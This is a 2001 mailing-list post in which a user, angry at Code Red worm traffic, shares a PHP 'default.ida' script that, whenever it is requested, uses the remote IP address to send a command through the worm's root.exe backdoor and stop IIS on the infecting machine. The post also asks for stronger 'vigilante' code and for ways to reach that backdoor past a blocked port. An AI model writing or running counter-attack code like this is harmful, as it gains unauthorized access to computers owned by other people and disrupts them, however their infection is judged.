[NTLUG:Discuss] Code Red Concerns Revisited

Daniel Hauck xdesign at hotmail.com
Tue Sep 11 05:12:37 CDT 2001 

Code Red hits continue to hit my web server in a fairly constant stream.
Obviously no new variants are running and so the latest version continues to
be the one.  As we all know, @Home users have fallen victim to the
mass-ignorance of its ubiquitous Microsoft users.  These "install all
options and let all defaults fly" users are blissfully unaware of their role
as the target of blame for a loss in quality of service for a great number
of @Home users.

*I* am an @Home user and I currently still have "normal" access to the
internet both incoming and outgoing.  I would like to protect my "internet"
by running a counter-attack.  I have been running a "default.ida" file that
is actually a PHP4 script (apparently) designed to shut down some services
but that does not shut down the Code Red process(es).

With this, I am soliciting for the most effective anti-code-red code I can
install onto a Linux/Apache/PHP4 server.  I am unashamed to host such code
as such a vigilante move is the only forseeable means by which we can
protect our own interests.  I'm completely unhappy with the casual ignorance
of most MS users (ignorance by design) and the blanket method @Home was
forced into [permanantly?] applying against its users.

The worst part is that @Home's move, while protecting many users against
infection, protects infected users from disinfection!  How is that for
irony?  So the infected and protected users remain free to transmit their
flags of stupidity free from the backlash of hackers and vigilante code.

Here is my vigilante code:

---
default.ida:
<?
        $command  = "lynx -source http://";
        $command .= $REMOTE_ADDR;
        $command .= "/scripts/root.exe?/c+iisreset+/stop";

        $retvalu  = exec($command);
?>
---

Simple, yet [hopefully] effective.  I know that there are methods at PHP's
disposal to perform the same function(s) for which "lynx" is being used.
But simplicity was part the goal in this case.  However, for reasons stated
above, I don't believe I'm making the most of the situation here.

I know that "Code Red" is an old issue, but it's actually very much alive
and as far as I'm concerned, a valid and active one.

Now, I know that in addition to the port 80 vulnerability, the newest breed
of Code Red also opens a backdoor of some type.  My question is if this
backdoor can be exploited in spite of the blocked port 80?  And if so, how?

More information about the Discuss mailing list